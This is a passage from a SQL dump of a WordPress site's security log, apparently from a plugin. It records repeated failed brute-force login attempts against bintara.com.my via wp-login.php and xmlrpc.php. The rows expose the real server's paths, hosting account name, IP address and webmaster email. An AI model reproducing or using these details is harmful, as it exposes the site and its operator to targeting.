16:43:33',17741880,19232248,'https://bintara.com.my/wp-login.php',1,0,'74.201.172.148'),(25107,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.46.95\";s:11:\"REMOTE_PORT\";s:5:\"53224\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJbIDYpjlmVadK6PeG9SwAAAMI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568824096.6482\";s:12:\"REQUEST_TIME\";s:10:\"1568824096\";}}','notice','2019-09-18 16:28:18','2019-09-18 16:28:17',18257752,19552680,'https://bintara.com.my/xmlrpc.php',1,0,'151.80.46.95'),(25106,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.46.95\";s:11:\"REMOTE_PORT\";s:5:\"52766\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJbHSR0vdvYEIduPCL7vQAAARg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568824093.6938\";s:12:\"REQUEST_TIME\";s:10:\"1568824093\";}}','notice','2019-09-18 16:28:15','2019-09-18 16:28:14',17740848,19232232,'https://bintara.com.my/wp-login.php',1,0,'151.80.46.95'),(25105,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.201.132.190\";s:11:\"REMOTE_PORT\";s:5:\"56354\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJZTjYpjlmVadK6PeG8pgAAANY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568823630.2768\";s:12:\"REQUEST_TIME\";s:10:\"1568823630\";}}','notice','2019-09-18 16:20:31','2019-09-18 16:20:30',18257296,19554120,'https://bintara.com.my/xmlrpc.php',1,0,'195.201.132.190'),(25104,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.201.132.190\";s:11:\"REMOTE_PORT\";s:5:\"55760\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJZSyoT36h4YaCzO-APKQAAAZI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568823627.2758\";s:12:\"REQUEST_TIME\";s:10:\"1568823627\";}}','notice','2019-09-18 16:20:28','2019-09-18 16:20:27',17741256,19232752,'https://bintara.com.my/wp-login.php',1,0,'195.201.132.190'),(25103,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"81.177.49.60\";s:11:\"REMOTE_PORT\";s:5:\"50779\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJVvjYpjlmVadK6PeG7bwAAAMY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568822718.907\";s:12:\"REQUEST_TIME\";s:10:\"1568822718\";}}','notice','2019-09-18 16:05:20','2019-09-18 16:05:19',18258064,19558160,'https://bintara.com.my/xmlrpc.php',1,0,'81.177.49.60'),(25102,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"81.177.49.60\";s:11:\"REMOTE_PORT\";s:5:\"48707\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJVuzYpjlmVadK6PeG7bgAAAMM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568822716.0882\";s:12:\"REQUEST_TIME\";s:10:\"1568822716\";}}','notice','2019-09-18 16:05:17','2019-09-18 16:05:16',17743280,19234176,'https://bintara.com.my/wp-login.php',1,0,'81.177.49.60'),(25101,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"197.248.157.11\";s:11:\"REMOTE_PORT\";s:5:\"53524\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJT9zYpjlmVadK6PeG62AAAAMU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568822263.2257\";s:12:\"REQUEST_TIME\";s:10:\"1568822263\";}}','notice','2019-09-18 15:57:44','2019-09-18 15:57:43',18258136,19554384,'https://bintara.com.my/xmlrpc.php',1,0,'197.248.157.11'),(25100,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"197.248.157.11\";s:11:\"REMOTE_PORT\";s:5:\"52880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJT9HcOb4UlVF5wccH@dQAAAcE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568822260.404\";s:12:\"REQUEST_TIME\";s:10:\"1568822260\";}}','notice','2019-09-18 15:57:41','2019-09-18 15:57:40',17740136,19232232,'https://bintara.com.my/wp-login.php',1,0,'197.248.157.11'),(25099,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"47.91.229.187\";s:11:\"REMOTE_PORT\";s:5:\"44954\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJSDFlvzIDnRn6zOHULowAAAIw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568821772.3858\";s:12:\"REQUEST_TIME\";s:10:\"1568821772\";}}','notice','2019-09-18 15:49:33','2019-09-18 